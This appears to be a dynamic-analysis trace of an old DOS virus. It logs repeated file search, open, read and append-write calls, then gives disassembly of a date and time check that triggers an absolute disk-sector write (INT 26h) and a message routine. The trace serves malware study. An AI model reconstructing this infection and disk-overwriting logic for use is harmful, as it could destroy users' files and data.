2018-12-25T12:02:08.150054176Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:02:08.163184061Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:02:08.167281508Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:08.171427753Z 62 PC: 14190 | Close file
2018-12-25T12:02:08.275817495Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.279922669Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.28677651Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.293411623Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.295941909Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.29850971Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.440152121Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.442501909Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.501851376Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.510170851Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.512859399Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.519448356Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.526366791Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.528128103Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.531604705Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.539318946Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.541048445Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.547878691Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.555994248Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.558373845Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.565136353Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.571553498Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.572737075Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.57655093Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.584606251Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.585779621Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.592968421Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.601057633Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.603804591Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.610595516Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.618728339Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.620088695Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.623142135Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.631128644Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.63241002Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.639746541Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.647575412Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.65037823Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.656951816Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.664569546Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.665880022Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.669213421Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.678052995Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.679354323Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.685678073Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.694212161Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.696821131Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.704147167Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.711120011Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.713167446Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.717002319Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.725284858Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.726908033Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.734412923Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.742609818Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.744277244Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.748952602Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.750663886Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.751762053Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.75448746Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:02:08.756562861Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:02:08.758503976Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2